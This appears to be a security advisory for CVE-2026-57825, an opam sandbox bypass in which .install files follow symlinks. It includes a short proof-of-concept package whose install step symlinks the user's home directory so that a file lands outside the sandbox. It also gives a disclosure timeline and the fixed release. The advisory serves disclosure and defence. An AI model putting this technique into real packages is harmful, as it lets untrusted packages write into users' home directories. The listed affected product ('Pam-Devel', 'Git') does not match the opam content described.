PT-2026-56690 · Git · Pam-Devel

Publicado

2026-07-07

·

Atualizado

2026-07-07

·

CVE-2026-57825

CVSS v3.1

5.7

Média

VetorAV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Summary

Installing files through .install files do not check symlinks resolution of the target path, and so can bypass sandboxing.

Exploit

Let's imagine a test package whose test.install file looks like the following:
share root: [
 "test" {"blah/pwnd"}
]
and test.opam file:
opam-version: "2.0"
install: ["sh" "-c" "ln -s "$HOME" "%{share}%/blah""]
Installing this package will write the pwnd file in the home directory of the current user, bypassing sandboxing.

Timeline

  • 2026-05-15: Kate reported the issue to the rest of the opam team and the OCaml Security team
  • 2026-06-22: Nathan wrote a fix which was then reviewed by Raja and refined over the next 2 weeks
  • 2026-07-08: opam 2.5.2 was released with the fix

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Identificadores relacionados

CVE-2026-57825
OSEC-2026-10

Produtos afetados

Pam-Devel